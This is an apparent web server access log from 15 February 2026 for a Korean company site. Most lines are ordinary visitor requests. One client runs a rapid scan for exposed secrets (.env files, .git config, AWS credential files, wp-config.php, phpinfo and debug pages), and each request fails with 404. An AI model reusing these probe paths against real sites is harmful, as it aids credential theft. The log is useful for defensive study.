"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:22:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 141.51.110.126] [Length 8988] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:35:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 44.212.95.173] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:42:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 84.254.106.197] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:46:39 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:06:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:16:37 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:16:37 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:16:38 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:16:38 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:02:39:57 +0000] - 200 200 - HEAD https www.hanmocnn.co.kr "/" [Client 146.70.185.32] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-" -[15/Feb/2026:03:42:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:03:42:40 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:03:42:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:03:42:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:03:42:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:04:33:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 8988] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:04:33:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/%22assets/js/script.js%22" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 195.178.110.132] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:04:33:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 195.178.110.132] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 8988] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/%22assets/js/i18n.js%22" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:04:33:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.js" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws-config.js" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws.config.js" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:04:33:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:04:33:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:04:33:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:33:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:39:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:39:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:04:39:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:04:39:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:04:39:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:11:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8984] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:05:11:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:11:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:11:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/dcsintegration.png" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:11:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:11:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:11:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:22:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8988] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:05:22:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:22:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:22:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.jpg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:22:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:22:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:22:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:26:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8981] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:05:26:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:26:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:26:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 705331] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:26:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:26:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:26:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:27:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8966] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:05:27:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:27:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 705331] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:05:27:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] 